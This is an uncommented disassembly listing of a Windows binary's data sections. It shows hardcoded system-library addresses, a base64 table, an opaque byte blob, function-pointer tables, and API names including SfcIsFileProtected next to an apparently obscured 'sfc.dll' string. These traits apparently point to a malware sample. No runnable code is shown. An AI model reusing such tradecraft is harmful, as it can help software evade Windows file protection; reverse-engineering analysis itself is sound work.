dword_448620 dd 0 ; DATA XREF: sub_43BB7B+173�w
; sub_43BB7B+1D8�w ...
dword_448624 dd 771C1E56h ; DATA XREF: sub_43D3CC+66�w
; sub_43F6B1+5D�r
align 10h
dword_448630 dd 0 ; DATA XREF: sub_43B9CB+CE�w
; sub_43B9CB+11D�w ...
dd 0FEh dup(0)
dword_448A2C dd 73D9C489h ; DATA XREF: sub_440F62+BA�w
dword_448A30 dd 0 ; DATA XREF: sub_43BB7B+DD�w
dword_448A34 dd 77E79881h ; DATA XREF: sub_43C105+22C�w
; sub_4413B6+CB�r ...
dword_448A38 dd 73D9C4C5h ; DATA XREF: sub_440F62+9E�w
dword_448A3C dd 77E777EFh ; DATA XREF: sub_43B5A1+8�r
; sub_43C105+408�w ...
dword_448A40 dd 77D48137h ; DATA XREF: sub_43BDDE+242�w
; sub_43FB8B+1029�r ...
dword_448A44 dd 77414CDCh ; DATA XREF: sub_43BB7B+2F�r
; sub_43E073+22�r ...
align 10h
word_448A50 dw 0 ; DATA XREF: sub_43E5EA+509�w
; sub_43E5EA+534�r ...
align 4
dd 1F3h dup(0)
dword_449220 dd 77D47EE5h ; DATA XREF: sub_43BDDE+19A�w
; sub_440C0A+17D�r
dword_449224 dd 77D49A11h ; DATA XREF: sub_43BDDE+9E�w
; sub_4419F6+528�r
dword_449228 dd 0 ; DATA XREF: sub_43BB7B+D2�w
; sub_43F058:loc_43F0E2�r
align 10h
dword_449230 dd 5 dup(0) ; DATA XREF: sub_43BB7B+C2�o
; sub_43E5EA+1A0�o ...
dword_449244 dd 77E805D8h ; DATA XREF: sub_43B4DD+28�r
; sub_43B69E+28�r ...
dword_449248 dd 77E7980Ah ; DATA XREF: sub_43C0EE+F�r
; sub_43C105+1F4�w
dword_44924C dd 73DA018Fh ; DATA XREF: sub_440F62+19A�w
dword_449250 dd 77C7F85Ah ; DATA XREF: sub_43D4B3+4A�w
; sub_43FB8B+795�r ...
dword_449254 dd 77132EF6h ; DATA XREF: sub_43A58C+44�r
; sub_43B4DD+BD�w ...
dword_449258 dd 77E75D9Eh ; DATA XREF: sub_43C105+2B8�w
; sub_43DA75+43�r ...
dword_44925C dd 77E61608h ; DATA XREF: sub_43C105+264�w
; sub_43E073+2C�r
dword_449260 dd 41h dup(0) ; DATA XREF: sub_43BB7B+7A�o
; sub_43BB7B+ED�o ...
dword_449364 dd 77E6BD13h ; DATA XREF: sub_43C105+37C�w
; sub_442F46+14C2�r
align 10h
dword_449370 dd 0 ; DATA XREF: sub_43F6B1+21�w
; sub_43FB8B+7C�r ...
dword_449374 dd 0 ; DATA XREF: sub_43FB8B+495�w
; sub_43FB8B+4AB�r ...
dword_449378 dd 0 ; DATA XREF: sub_43FB8B+54E�w
; sub_43FB8B+621�r ...
dword_44937C dd 0 ; DATA XREF: sub_43FB8B+86F�w
; sub_43FB8B+906�r ...
dword_449380 dd 0 ; DATA XREF: sub_43FB8B+AA5�w
; sub_43FB8B+BD2�r ...
dword_449384 dd 0 ; DATA XREF: sub_43FB8B+B62�w
; sub_43FB8B+C37�r ...
dword_449388 dd 0 ; DATA XREF: sub_43FB8B+D03�w
; sub_43FB8B+D27�r ...
dword_44938C dd 0 ; DATA XREF: sub_43FB8B+EAA�w
; sub_43FB8B+EC8�r ...
dword_449390 dd 0 ; DATA XREF: sub_43FB8B+EFD�w
; sub_4419F6+5AC�r
dword_449394 dd 0 ; DATA XREF: sub_43FB8B+F4D�w
; sub_4419F6+5E3�r
dword_449398 dd 0 ; DATA XREF: sub_43FB8B+F9D�w
; sub_4419F6+617�r
dword_44939C dd 0 ; DATA XREF: sub_43FB8B+FED�w
; sub_4419F6+64B�r
dd 4A4h dup(0)
dword_44A630 dd 77D44200h ; DATA XREF: sub_43BDDE+10E�w
; sub_440C0A+328�r
dword_44A634 dd 77E79E34h ; DATA XREF: sub_43A324+1C�r
; sub_43C105+210�w
dword_44A638 dd 73D9D340h ; DATA XREF: sub_43CE20+B9�r
; sub_43E2C0+66�r ...
dword_44A63C dd 77E7A099h ; DATA XREF: sub_43C105+3D0�w
dword_44A640 dd 0 ; DATA XREF: sub_43BB7B+E8�w
; sub_44206A+165�r
dword_44A644 dd 73D9D5E0h ; DATA XREF: sub_43CE20+AB�r
; sub_440F62+10E�w ...
dword_44A648 dd 77E8074Ah ; DATA XREF: sub_43B6F6+60�r
; sub_43C105+3B4�w
dword_44A64C dd 77D414D4h ; DATA XREF: sub_43BDDE+66�w
; sub_43FB8B+537�r ...
dword_44A650 dd 77F7E300h ; DATA XREF: sub_43C5C3+38A�w
; sub_43E507+D5�r ...
dword_44A654 dd 77E77963h ; DATA XREF: sub_43B6F6+71�r
; sub_43B9CB+84�r ...
align 10h
dword_44A660 dd 0 ; DATA XREF: sub_43D622+2A�r
; sub_43E5EA+431�r ...
dd 3E7h dup(0)
dword_44B600 dd 73D9DBA2h ; DATA XREF: sub_440F62+146�w
dword_44B604 dd 77D444F0h ; DATA XREF: sub_43BDDE+25E�w
dword_44B608 dd 0 ; DATA XREF: sub_43C105+1A0�w
dword_44B60C dd 77D5BA26h ; DATA XREF: sub_43BDDE+4A�w
; sub_4419F6+5B3�r ...
off_44B610 dd offset byte_41A00D ; DATA XREF: sub_440C0A+268�w
; sub_44229C+1C3�r
dword_44B614 dd 77E681EFh ; DATA XREF: sub_43C105+440�w
; sub_441189+D4�r ...
dword_44B618 dd 77DD189Ah ; DATA XREF: sub_43E1C6+82�w
; sub_43E3CE+52�r
dword_44B61C dd 77E7C2C4h ; DATA XREF: sub_43C105+398�w
; sub_440C0A+DB�r ...
dword_44B620 dd 77D4A102h ; DATA XREF: sub_43BDDE+1B6�w
; sub_440C0A+18D�r
dword_44B624 dd 77E793EFh ; DATA XREF: sub_43C105+114�w
; sub_44247F+4C�r ...
dword_44B628 dd 77D43FEDh ; DATA XREF: sub_43BDDE+146�w
; sub_43FB8B+EF1�r ...
dword_44B62C dd 0 ; DATA XREF: sub_43A58C+D7A�r
; sub_43BB7B+8B�w
dword_44B630 dd 73D92B86h ; DATA XREF: sub_43A55F+20�r
; sub_43A58C+A47�r ...
dword_44B634 dd 73D9E5C5h ; DATA XREF: sub_43A58C+39E�r
; sub_43A58C+48D�r ...
dword_44B638 dd 0 ; DATA XREF: sub_43F357+2FC�r
; sub_440C0A+28F�w ...
dword_44B63C dd 77D651AFh ; DATA XREF: sub_43B3B1+23�r
; sub_43B3B1+43�r ...
dword_44B640 dd 77E77CCEh ; DATA XREF: sub_43C105+184�w
; sub_43F058+1CC�r
dword_44B644 dd 77D6ADD7h ; DATA XREF: sub_43BDDE+1D2�w
; sub_4419F6+1DE�r ...
dword_44B648 dd 7720C039h ; DATA XREF: sub_43B5B8+12�r
; sub_43B5B8+32�r ...
dword_44B64C dd 73D9D320h ; DATA XREF: sub_43E2C0+E5�r
; sub_440F62+D6�w
dword_44B650 dd 77E6C9E0h ; DATA XREF: sub_43B9CB+6E�r
; sub_43C105+328�w
dword_44B654 dd 77D45F74h ; DATA XREF: sub_43BDDE+162�w
; sub_43FB8B+4C5�r
dword_44B658 dd 77D5BB6Ch ; DATA XREF: sub_43BDDE+296�w
; sub_4419F6+4C3�r
dword_44B65C dd 77D47D27h ; DATA XREF: sub_43BDDE+2B2�w
; sub_43FB8B+4B2�r ...
dword_44B660 dd 77F7E21Fh ; DATA XREF: sub_43C5C3+35A�w
; sub_43E507+64�r ...
dword_44B664 dd 77E73C49h ; DATA XREF: sub_43C105+18�w
; sub_43DA5C+12�r ...
dword_44B668 dd 77E6C0E3h ; DATA XREF: sub_43B9CB+96�r
; sub_43C105+30C�w ...
align 10h
dword_44B670 dd 40h dup(0) ; DATA XREF: sub_43BB7B+F8�o
; sub_43BB7B+224�o ...
dword_44B770 dd 77E7751Ah ; DATA XREF: sub_43C105+29C�w
; sub_43D622+C�r ...
dword_44B774 dd 0 ; DATA XREF: sub_43BB7B+A1�w
; sub_43FB8B+3A5�r
dword_44B778 dd 77E79424h ; DATA XREF: sub_43C105+478�w
; sub_43DA75+11B�r
dword_44B77C dd 77D43DD3h ; DATA XREF: sub_43BDDE+2CE�w
; sub_440C0A+2FE�r
dword_44B780 dd 77E71702h ; DATA XREF: sub_43C105+45C�w
; sub_43DA75+D3�r
dword_44B784 dd 0 ; DATA XREF: sub_440BBF+11�r
; sub_440BBF+19�o ...
dword_44B788 dd 77E7A837h ; DATA XREF: sub_43C105+88�w
; sub_43CF47+43�r ...
align 10h
dword_44B790 dd 0 ; DATA XREF: sub_43B9CB:loc_43B9DB�w
; sub_43B9CB+4E�r ...
dd 0FEh dup(0)
dword_44BB8C dd 77E79D8Ch ; DATA XREF: sub_43C105+DC�w
; sub_43CF47+431�r ...
dword_44BB90 dd 77E7AC37h ; DATA XREF: sub_43B9CB+16B�r
; sub_43BB7B+124�r ...
align 8
dword_44BB98 dd 77E7C657h ; DATA XREF: sub_43C105+494�w
; sub_441189+22�r
dword_44BB9C dd 77E78C81h ; DATA XREF: sub_43C105+C0�w
; sub_43F8DE+A3�r ...
dword_44BBA0 dd 771214E8h ; DATA XREF: sub_43A58C+F1�r
; sub_43A58C+527�r ...
dword_44BBA4 dd 77D5C13Ah ; DATA XREF: sub_43BDDE+17E�w
; sub_43D912+1E�r ...
dword_44BBA8 dd 0 ; DATA XREF: sub_43B5A1+3�o
; sub_43B5A1+E�r ...
dword_44BBAC dd 73D9DBAFh ; DATA XREF: sub_440F62+12A�w
; sub_441353:loc_441367�r ...
dword_44BBB0 dd 7712151Dh ; DATA XREF: sub_43B4DD+82�w
; sub_43E5EA+637�r
dword_44BBB4 dd 771C69DCh ; DATA XREF: sub_43D3CC+4A�w
align 10h
dword_44BBC0 dd 77FC5460h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_43E507+13�o
; sub_43E507+5F�o ...
_bss ends
; Section 6. (virtual address 0004C000)
; Virtual size : 00001C00 ( 7168.)
; Section size in file : 00001C00 ( 7168.)
; Offset to raw data for section: 0004C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 44C000h
off_44C000 dd offset sub_444F30 ; DATA XREF: .text:0043A1B5�r
dword_44C004 dd 0 ; DATA XREF: sub_43A1C3+4A�w
; sub_43A1C3+64�r
dword_44C008 dd 0 ; DATA XREF: sub_43A1C3+38�w
dword_44C00C dd 0 ; DATA XREF: sub_43A1C3+5F�w
; sub_43A1C3:loc_43A23C�r
dword_44C010 dd 0 ; DATA XREF: sub_43A25C+57�w
align 8
dd 7325h
aWr: ; DATA XREF: sub_43A1C3+3D�o
; sub_43A1C3+4F�o ...
unicode 0, <wr>,0
align 4
dd 4 dup(0)
dword_44C034 dd 0 ; DATA XREF: .text:0043A0F2�w
dword_44C038 dd 0 ; DATA XREF: .text:0043A0FC�w
; .text:0043A117�r ...
dword_44C03C dd 0 ; DATA XREF: .text:0043A104�w
dword_44C040 dd 14h dup(0) ; DATA XREF: .text:0043A111�o
; .text:0043A11F�o
dword_44C090 dd 3 ; DATA XREF: sub_43A348+41�r
; sub_43A348+15D�r ...
dword_44C094 dd 6 ; DATA XREF: sub_43CF47+32�r
; sub_43CF47+161�r ...
word_44C098 dw 2 ; DATA XREF: sub_43A58C+916�r
; sub_43CF47:loc_43D306�r ...
align 4
dword_44C09C dd 5 ; DATA XREF: sub_43B9CB+182�r
; sub_43CF47+27B�r ...
dword_44C0A0 dd 4 ; DATA XREF: sub_43A58C+90D�r
; sub_43B7A3+79�r ...
word_44C0A4 dw 6 ; DATA XREF: sub_43CE20+107�r
; sub_43E5EA+143�r ...
align 4
dword_44C0A8 dd 6 ; DATA XREF: sub_43A348+88�r
; sub_43CF47:loc_43D276�r ...
dword_44C0AC dd 1 ; DATA XREF: sub_43A58C+737�r
; sub_43A58C+A2D�r ...
word_44C0B0 dw 7 ; DATA XREF: sub_43D523+71�r
; sub_43E2C0+D2�r ...
align 4
dword_44C0B4 dd 8 ; DATA XREF: sub_43A58C+32B�r
; sub_43B857+44�r ...
dword_44C0B8 dd 3 ; DATA XREF: sub_43B6F6+14�r
; sub_43B6F6+77�r ...
word_44C0BC dw 9 ; DATA XREF: sub_43A58C+B74�r
; sub_43C5C3+46�r ...
align 10h
word_44C0C0 dw 2 ; DATA XREF: sub_43A58C+4C�r
; sub_43A58C+413�r ...
align 4
dword_44C0C4 dd 7 ; DATA XREF: sub_43ECC9+1C�r
; sub_43ECC9+E6�r ...
dword_44C0C8 dd 0 ; DATA XREF: sub_43B3B1:loc_43B441�r
; sub_43CF47+69�r ...
word_44C0CC dw 7 ; DATA XREF: sub_43A58C+3E7�r
; sub_43E434+19�r ...
align 10h
word_44C0D0 dw 7 ; DATA XREF: sub_43CF47+313�r
; sub_43CF47+349�r ...
align 4
dword_44C0D4 dd 6 ; DATA XREF: sub_43A58C+8C1�r
; sub_43C974+19�r ...
word_44C0D8 dw 2 ; DATA XREF: sub_43DA75+18D�r
; sub_43E5EA+237�r ...
align 4
dword_44C0DC dd 3 ; DATA XREF: sub_43A58C+13D�r
; sub_43B7A3+39�r ...
word_44C0E0 dw 1 ; DATA XREF: sub_43A348+46�r
; sub_43ECC9+97�r ...
align 4
dword_44C0E4 dd 9 ; DATA XREF: sub_43A348:loc_43A4A0�r
; sub_43E073+F9�r ...
word_44C0E8 dw 1 ; DATA XREF: sub_43B9CB+C2�r
; sub_43CE20+85�r ...
align 4
dword_44C0EC dd 4 ; DATA XREF: sub_43BB7B+190�r
; sub_43C5C3+B1�r ...
dword_44C0F0 dd 1 ; DATA XREF: sub_43C5C3+BB�r
; sub_43CF47+380�r ...
dword_44C0F4 dd 7 ; DATA XREF: sub_43A58C+73C�r
; sub_43A58C+9A6�r ...
dword_44C0F8 dd 7 ; DATA XREF: sub_43B9CB+BC�r
; sub_43BB7B+178�r ...
word_44C0FC dw 6 ; DATA XREF: sub_43CF47+21�r
; sub_43CF47+38B�r ...
align 10h
word_44C100 dw 3 ; DATA XREF: sub_43A4B5+44�r
; sub_43A58C+8E4�r ...
align 4
word_44C104 dw 8 ; DATA XREF: sub_43A58C+54D�r
; sub_43C5C3+4D�r ...
align 4
dword_44C108 dd 6 ; DATA XREF: sub_43A348+10�r
; sub_43B63B+48�r ...
dword_44C10C dd 6 ; DATA XREF: sub_43DA75+1D5�r
; sub_43DD90+12C�r ...
dword_44C110 dd 5 ; DATA XREF: sub_43C974+1C8�r
; sub_43CF47+17B�r ...
dword_44C114 dd 8 ; DATA XREF: sub_43B9CB+159�r
; sub_43D622+189�r ...
word_44C118 dw 3 ; DATA XREF: sub_43A4B5+30�r
; sub_43D622+1EB�r ...
align 4
dword_44C11C dd 5 ; DATA XREF: sub_43E073+B9�r
; sub_43ECC9+16C�r ...
dword_44C120 dd 5 ; DATA XREF: sub_43C5C3+1FD�r
; sub_43ECC9+18B�r ...
word_44C124 dw 6 ; DATA XREF: sub_43A58C+7A7�r
; sub_43BB7B+67�r ...
align 4
dword_44C128 dd 9 ; DATA XREF: sub_43A58C+1F4�r
; sub_43A58C+8B7�r ...
dword_44C12C dd 8 ; DATA XREF: sub_43B9CB+15F�r
; sub_43CBE3+19A�r ...
word_44C130 dw 3 ; DATA XREF: sub_43A58C+55B�r
; sub_43A58C+5EA�r ...
align 4
dword_44C134 dd 8 ; DATA XREF: sub_43A348+E1�r
; sub_43B9CB+FC�r ...
dword_44C138 dd 0 ; DATA XREF: sub_43A58C+4F7�r
; sub_43A58C+850�r ...
dword_44C13C dd 3 ; DATA XREF: sub_43A4B5+59�r
; sub_43A58C+5F1�r ...
dword_44C140 dd 9 ; DATA XREF: sub_43A58C+B2E�r
; sub_43D622+15�r ...
word_44C144 dw 6 ; DATA XREF: sub_43A348+124�r
; sub_43A58C+634�r ...
align 4
dword_44C148 dd 2 ; DATA XREF: sub_43A58C+5AC�r
; sub_43BB7B+14A�r ...
dword_44C14C dd 6 ; DATA XREF: sub_43A58C+41A�r
; sub_43CBE3+140�r ...
word_44C150 dw 8 ; DATA XREF: sub_43A58C+78F�r
; sub_43A58C+AA1�r ...
align 4
dword_44C154 dd 7 ; DATA XREF: sub_43A58C+698�r
; sub_43C5C3+242�r ...
dword_44C158 dd 9 ; DATA XREF: sub_43A348+82�r
; sub_43A58C+9ED�r ...
dword_44C15C dd 9 ; DATA XREF: sub_43ECC9+43�r
; sub_43EE89+C7�r ...
word_44C160 dw 1 ; DATA XREF: sub_43DD90+4D�r
; sub_43F058+16�r ...
align 4
dword_44C164 dd 4 ; DATA XREF: sub_43A58C+813�r
; sub_43C974+135�r ...
dword_44C168 dd 0 ; DATA XREF: sub_43A58C+767�r
; sub_43A58C+81C�r ...
word_44C16C dw 1 ; DATA XREF: sub_43A58C+2D�r
; sub_43CF47+89�r ...
align 10h
word_44C170 dw 2 ; DATA XREF: sub_43A348+A3�r
; sub_43A58C+1E2�r ...
align 4
word_44C174 dw 7 ; DATA XREF: sub_43A58C+8F1�r
; sub_43A58C+A12�r ...
align 4
word_44C178 dw 4 ; DATA XREF: sub_43B6F6+96�r
; sub_43C5C3+21F�r ...
align 4
dword_44C17C dd 5 ; DATA XREF: sub_43A58C+8DB�r
; sub_43CE20+CC�r ...
word_44C180 dw 4 ; DATA XREF: sub_43A58C+34�r
; sub_43A58C+463�r ...
align 4
dword_44C184 dd 2 ; DATA XREF: sub_43A4B5:loc_43A4F4�r
; sub_43A58C+5D7�r ...
dword_44C188 dd 0 ; DATA XREF: sub_43A58C+5DD�r
; sub_43B3B1+67�r ...
dword_44C18C dd 0 ; DATA XREF: sub_43A55F+8�r
; sub_43ECC9:loc_43EE4C�r ...
dword_44C190 dd 2 ; DATA XREF: sub_43F6B1+86�r
; sub_43FB8B+35E�r ...
dword_44C194 dd 9 ; DATA XREF: sub_43A58C+256�r
; sub_43B3B1+77�r ...
dword_44C198 dd 2 ; DATA XREF: sub_43A58C+BE3�r
; sub_43C5C3+2B�r ...
dword_44C19C dd 6 ; DATA XREF: sub_43CBE3+194�r
; sub_43CF47+2A6�r ...
dword_44C1A0 dd 3 ; DATA XREF: sub_43A58C+7EA�r
; sub_43C5C3+256�r ...
word_44C1A4 dw 7 ; DATA XREF: sub_43A348+CB�r
; sub_43A58C+83B�r ...
align 4
dword_44C1A8 dd 2 ; DATA XREF: sub_43A58C+663�r
; sub_43A58C+8F8�r ...
dword_44C1AC dd 5 ; DATA XREF: sub_43A58C:loc_43AFCA�r
; sub_43B992+1C�r ...
dword_44C1B0 dd 7 ; DATA XREF: sub_43A58C:loc_43AB93�r
; sub_43D622+1E1�r ...
word_44C1B4 dw 4 ; DATA XREF: sub_43A58C+53�r
; sub_43B3B1+60�r ...
align 4
dword_44C1B8 dd 5 ; DATA XREF: sub_43A58C+7C5�r
; sub_43F357+50�r ...
dword_44C1BC dd 9 ; DATA XREF: sub_43DA75+E4�r
; sub_43ECC9+80�r ...
word_44C1C0 dw 4 ; DATA XREF: sub_43A58C+6ED�r
; sub_43DA75:loc_43DB2B�r ...
align 4
dword_44C1C4 dd 5 ; DATA XREF: sub_43A58C+786�r
; sub_43B3B1+7C�r ...
dword_44C1C8 dd 0 ; DATA XREF: sub_43A4B5+52�r
; sub_43BB7B+11C�r
dword_44C1CC dd 6 ; DATA XREF: sub_43A58C+971�r
; sub_43EC87+12�r ...
dword_44C1D0 dd 7 ; DATA XREF: sub_43A58C+27D�r
; sub_43B7A3+73�r ...
dword_44C1D4 dd 2 ; DATA XREF: sub_43C5C3+66�r
; sub_43D523+A2�r ...
dword_44C1D8 dd 9 ; DATA XREF: sub_43A58C+575�r
; sub_43FB8B+CB5�r ...
word_44C1DC dw 1 ; DATA XREF: sub_43A348+12B�r
; sub_43A58C+BBD�r ...
align 10h
word_44C1E0 dw 3 ; DATA XREF: sub_43A58C+6E6�r
; sub_43BB7B+138�r ...
align 4
dword_44C1E4 dd 4 ; DATA XREF: sub_43A58C+842�r
; sub_43DA5C�r ...
dword_44C1E8 dd 1 ; DATA XREF: sub_43A58C+305�r
; sub_43A58C+A9C�r ...
dword_44C1EC dd 8 ; DATA XREF: sub_43A58C+CEF�r
; sub_43C974+19D�r ...
word_44C1F0 dw 3 ; DATA XREF: sub_43A324+8�r
; sub_43B7A3+53�r ...
align 4
dword_44C1F4 dd 4 ; DATA XREF: sub_43A58C+B85�r
; sub_43C5C3+8D�r ...
dword_44C1F8 dd 3 ; DATA XREF: sub_43A58C+B8B�r
; sub_43C974+170�r ...
word_44C1FC dw 5 ; DATA XREF: sub_43A348+9�r
; sub_43CF47+2BD�r ...
align 10h
dword_44C200 dd 5 ; DATA XREF: sub_43A58C+88F�r
; sub_43A58C+923�r ...
dword_44C204 dd 1 ; DATA XREF: sub_43A58C+138�r
; sub_43A58C+1BF�r ...
word_44C208 dw 5 ; DATA XREF: sub_43A348+109�r
; sub_43CBE3+D�r ...
align 4
dword_44C20C dd 6 ; DATA XREF: sub_43B9CB+58�r
; sub_43D523+7E�r ...
dword_44C210 dd 1 ; DATA XREF: sub_43CF47+1B5�r
; sub_43D622+2D3�r ...
dword_44C214 dd 9 ; DATA XREF: sub_43B3B1+114�r
; sub_43E5EA+324�r ...
word_44C218 dw 5 ; DATA XREF: sub_43A58C+668�r
; sub_43B992+15�r ...
align 4
dword_44C21C dd 8 ; DATA XREF: sub_43A58C+35D�r
; sub_43A58C+8AE�r ...
dword_44C220 dd 4 ; DATA XREF: sub_43CBE3+A3�r
; sub_43E507+6A�r ...
dword_44C224 dd 5 ; DATA XREF: sub_43A58C+BD�r
; sub_43A58C+4CF�r ...
dword_44C228 dd 3 ; DATA XREF: sub_43DD90+207�r
; sub_440C0A+87�r ...
word_44C22C dw 7 ; DATA XREF: sub_43A58C:loc_43B0B3�r
; sub_43BB7B+1FD�r ...
align 10h
word_44C230 dw 6 ; DATA XREF: sub_43A58C+52D�r
; sub_43A58C+7A0�r ...
align 4
dword_44C234 dd 4 ; DATA XREF: sub_43B6F6:loc_43B784�r
; sub_43C5C3+23D�r ...
dword_44C238 dd 0 ; DATA XREF: sub_43BB7B+1A6�r
; sub_43C5C3+1E3�r ...
dword_44C23C dd 5 ; DATA XREF: sub_43B63B+43�r
; sub_43C5C3+25E�r ...
word_44C240 dw 2 ; DATA XREF: sub_43A58C+3E0�r
; sub_43A58C+7F7�r ...
align 4
dword_44C244 dd 4 ; DATA XREF: sub_43CE20+113�r
; sub_43CF47+1C�r ...
dword_44C248 dd 0 ; DATA XREF: sub_43B69E+3C�r
; sub_43C5C3+184�r ...
word_44C24C dw 9 ; DATA XREF: sub_43A58C+859�r
; sub_43FB8B+1D4�r ...
align 10h
word_44C250 dw 1 ; DATA XREF: sub_43D523+84�r
; sub_43F357+23B�r ...
align 4
dword_44C254 dd 9 ; DATA XREF: sub_43A58C+75E�r
; sub_43A58C+BB8�r ...
dword_44C258 dd 2 ; DATA XREF: sub_43B7A3+93�r
; sub_43EE89+23�r ...
dword_44C25C dd 8 ; DATA XREF: sub_43A58C+56F�r
; sub_43A58C+7CB�r ...
word_44C260 dw 2 ; DATA XREF: sub_43A58C+826�r
; sub_43D622+12D�r ...
align 4
word_44C264 dw 9 ; DATA XREF: sub_43A58C+A19�r
; sub_43B9CB+13B�r ...
align 4
dword_44C268 dd 4 ; DATA XREF: sub_43A58C+19A�r
; sub_43A58C+3D0�r ...
dword_44C26C dd 9 ; DATA XREF: sub_43A58C+98�r
; sub_43B857+7B�r ...
dword_44C270 dd 4 ; DATA XREF: sub_43A58C+8CA�r
; sub_43B7A3+9F�r ...
dword_44C274 dd 1 ; DATA XREF: sub_43A58C+16B�r
; sub_43B3B1+C6�r ...
dword_44C278 dd 2 ; DATA XREF: sub_43A348+9D�r
; sub_43CE20+51�r ...
word_44C27C dw 4 ; DATA XREF: sub_43B857+10�r
; sub_43B857+3D�r ...
align 10h
dword_44C280 dd 4 ; DATA XREF: sub_43A55F+10�r
; sub_43A58C+AF6�r ...
dword_44C284 dd 9 ; DATA XREF: sub_43A324+F�r
; sub_43A58C+282�r ...
dword_44C288 dd 6 ; DATA XREF: sub_43D523+3E�r
; sub_43E2C0+47�r ...
dword_44C28C dd 6 ; DATA XREF: sub_43A58C+166�r
; sub_43A58C+713�r ...
dword_44C290 dd 1 ; DATA XREF: sub_43E507+A�r
; sub_43E507+1E�w ...
dword_44C294 dd 77E60000h ; DATA XREF: sub_43C105+C�r
; sub_43C105+28�r ...
dword_44C298 dd 73D90000h ; DATA XREF: sub_440F62+13�w
; sub_440F62+2E�w ...
dword_44C29C dd 77D40000h ; DATA XREF: sub_43BDDE+13�w
; sub_43BDDE+2E�w ...
dword_44C2A0 dd 77C70000h ; DATA XREF: sub_43D4B3+13�w
; sub_43D4B3+2E�w ...
dword_44C2A4 dd 771B0000h ; DATA XREF: sub_43D3CC+13�w
; sub_43D3CC+2E�w ...
dword_44C2A8 dd 77120000h ; DATA XREF: sub_43B4DD+13�w
; sub_43B4DD+2E�w ...
dword_44C2AC dd 76BB0000h ; DATA XREF: sub_44229C:loc_442418�r
; sub_442D4B+13�w ...
dword_44C2B0 dd 76C60000h ; DATA XREF: sub_43B69E+13�w
; sub_43B69E+2E�w ...
dword_44C2B4 dd 773D0000h ; DATA XREF: sub_43E26E+13�w
; sub_43E26E+2E�w ...
dword_44C2B8 dd 77DD0000h ; DATA XREF: sub_43E1C6+13�w
; sub_43E1C6+2E�w ...
off_44C2BC dd offset aAbcdefghijklmn ; DATA XREF: sub_441932:loc_4419B3�r
; "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"...
dword_44C2C0 dd 0E860h, 0E9610000h, 2 dup(0) ; DATA XREF: sub_442F46+A4C�o
dword_44C2D0 dd 11h, 0Fh dup(0) ; DATA XREF: sub_43BDC4+8�o
dword_44C310 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_43BDC4+3�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh
dword_44C350 dd 0 ; DATA XREF: sub_43CF47+2F1�w
; sub_43CF47+395�w ...
off_44C354 dd offset sub_442CD0 ; DATA XREF: sub_43E5EA+5C3�o
dd offset sub_440F4B
dd offset sub_440BBF
dd offset sub_43E1A7
dd offset sub_4419EE
dd offset sub_442294
dd offset sub_43EE89
dword_44C370 dd 0 ; DATA XREF: sub_43BB7B+FE�w
; sub_43C974+10�r ...
off_44C374 dd offset sub_43B5B8 ; DATA XREF: .data:off_44C390�o
dd offset sub_43B5A1
dd offset sub_442EC1
dd offset sub_43EC7F
dd offset sub_43BDBC
dd offset sub_43E06B
dd offset sub_442EE8
off_44C390 dd offset off_44C374 ; DATA XREF: sub_43B857+B8�o
; sub_43F6B1+138�o
dword_44C394 dd 0 ; DATA XREF: sub_43B857+2F�r
; sub_43B857+6C�r ...
off_44C398 dd offset sub_43E48C ; DATA XREF: .data:off_44C3B4�o
dd offset sub_43E1AF
dd offset sub_43EE60
dd offset sub_440F43
dd offset sub_43D61A
dd offset sub_43B633
dd offset sub_43B857
off_44C3B4 dd offset off_44C398 ; DATA XREF: sub_43F6B1:loc_43F869�o
dword_44C3B8 dd 0FFFFFFFFh ; DATA XREF: sub_43A348+3A�r
dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
off_44C7B8 dd offset loc_43A3BF ; DATA XREF: sub_43A348+70�r
dd offset loc_43A3C7
dd offset loc_43A40D
dd offset loc_43A44B
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_43C5C3+2E8�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_43C5C3+2FB�o
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_43C5C3+30E�o
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_43C5C3+322�o
align 4
dword_44C81C dd 2ED40000h, 61746164h ; DATA XREF: sub_442F46+7E7�o
db 0
byte_44C825 db 4, 0, 0F2h ; DATA XREF: sub_442DA6+55�o
aUb_0 db 'ܜ',0
byte_44C82D db 1, 0, 9Ch ; DATA XREF: sub_442DA6+29�o
db 0C0h, 0
word_44C832 dw 0 ; DATA XREF: sub_442D4B+3C�o
aPsfcisfileprot db 'SfcIsFileProtected',0
dword_44C848 dd 738B0000h, 642E6366h ; DATA XREF: sub_442D4B+1C�o
db 2 dup(6Ch), 0
byte_44C853 db 0 ; DATA XREF: sub_442D4B+1�o
dd 6673A200h, 6C642E63h
db 6Ch, 0
word_44C85E dw 4 ; DATA XREF: sub_442B97+56�o
aS?_0 db 'S}=? ',0
word_44C866 dw 1 ; DATA XREF: sub_442B97+2A�o
db 0CBh, 97h, 0
byte_44C86B db 4 ; DATA XREF: sub_442AF2+6F�o
dd 5F547100h
db 43h, 29h, 0
byte_44C873 db 1 ; DATA XREF: sub_442AF2:loc_442B4F�o
dd 89AC00h
